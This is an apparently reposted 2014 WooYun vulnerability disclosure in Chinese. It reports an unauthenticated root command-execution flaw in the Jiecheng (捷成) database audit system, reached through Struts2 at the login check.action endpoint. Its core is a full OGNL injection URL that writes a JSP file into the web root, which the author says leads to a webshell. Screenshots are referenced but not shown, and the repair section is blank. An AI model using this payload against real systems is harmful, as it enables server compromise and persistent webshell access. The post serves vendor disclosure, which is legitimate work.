记录黑客技术中优秀的内容,传播黑客文化,分享黑客技术精华

捷成数据库审计系统命令执行(root权限)

2014-09-03 17:00

我想说:存在struts2漏洞,root权限,无需登录。

QQ图片20140605163026.jpg



登录提交的链接为:https://x.x.x.x/jddba/login/check.action

id  --->  root



QQ图片20140605163224.jpg



获取网站路径 ---> /usr/local/tomcat6/webapps/jddba/



QQ图片20140605163638.jpg



成功写入文件:

https://x.x.x.x/jddba/login/check.action?redirect:${

%23req%3d%23context.get('com.opensymphony.xwork2.dispatcher.HttpServletRequest'),

%23p%3d(%23req.getRealPath(%22/%22)%2b%22css3.jsp%22).replaceAll("\\\\", "/"),

new+java.io.BufferedWriter(new+java.io.FileWriter(%23p)).append(%23req.getParameter(%22c%22)).close()

}&c=%3c%25if(request.getParameter(%22f%22)!%3dnull)(new+java.io.FileOutputStream(application.getRealPath(%22%2f%22)%2brequest.getParameter(%22f%22))).write(request.getParameter(%22t%22).getBytes())%3b%25%3e



QQ图片20140605164010.jpg



最终获取webshell:



QQ图片20140605164335.jpg



QQ图片20140605164522.jpg





我还想说:先就这样吧,厂商请及时更新产品。

漏洞证明:

修复方案:


知识来源: www.wooyun.org/bugs/wooyun-2014-063674

阅读:115795 | 评论:0 | 标签:无

想收藏或者和大家分享这篇好文章→复制链接地址

“捷成数据库审计系统命令执行(root权限)”共有0条留言

发表评论

姓名:

邮箱:

网址:

验证码:

ADS

标签云

本页关键词